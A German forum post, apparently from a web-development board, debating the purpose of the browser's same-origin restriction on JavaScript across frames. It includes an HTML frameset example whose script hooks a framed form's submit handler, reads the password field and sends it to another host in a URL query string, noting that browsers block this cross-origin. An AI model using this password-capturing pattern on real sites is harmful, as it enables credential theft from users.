Hallo,

also, wenn ich auf der Originalseite bin und der Phisher hat es irgendwie geschafft dort ein Javascript an den Start zu bringen, das auf eine andere Domain verweist und meine Daten dort gephisht werden, dann ist das schlecht. Und so wuerde die bekannte und hier diskutierte Javascript-Einschraenkung Sinn machen.

Nein, das müsste er ohne die hier diskutierte Einschränkung gar nicht. Er könnte die Originalseite völlig unangetastet lassen. Er müsste nur den Quellcode kennen.

Ne, ich verstehe den Sinn der o.g. Einschraenkung nicht.

Beispiel:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
   "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<title>Spion</title>
<script type="text/javascript">
<!--
function setzeSpion() {
  frames["meins"].document.forms[0].onsubmit = parent.spioniere;
}

function spioniere() {
 var pw = frames["meins"].document.forms[0].elements["pw"].value;
 alert(pw);
 spionURI = "http://www.google.de?pw=" + pw;
 location.replace(spionURI);
 return false;
}
//-->
</script>
</head>
<frameset rows="100%" onload="setzeSpion();">
   <frame name="meins" src="Fremdesformular.html">
</frameset>
</html>

Fremdesformular.html:
...
<body>
<form action="irgendeinZiel.pl" method="POST">
...
<input type="Password" name="pw" value="" size="12" maxlength="12">
<input type="Submit" name="Submit" value="Absenden">
</form>
</body>
...

Könnte man statt Fremdesformular.html eine beliebige URI einsetzten, und würde frames["meins"].document.forms[0].onsubmit damit funktionieren (was es nicht tut, sondern eben permission denied auswirft), dann müsste man nur noch schauen, welches Formular man ansprechen will und wie der Name des Passwort-Feldes ist.

viele Grüße

Axel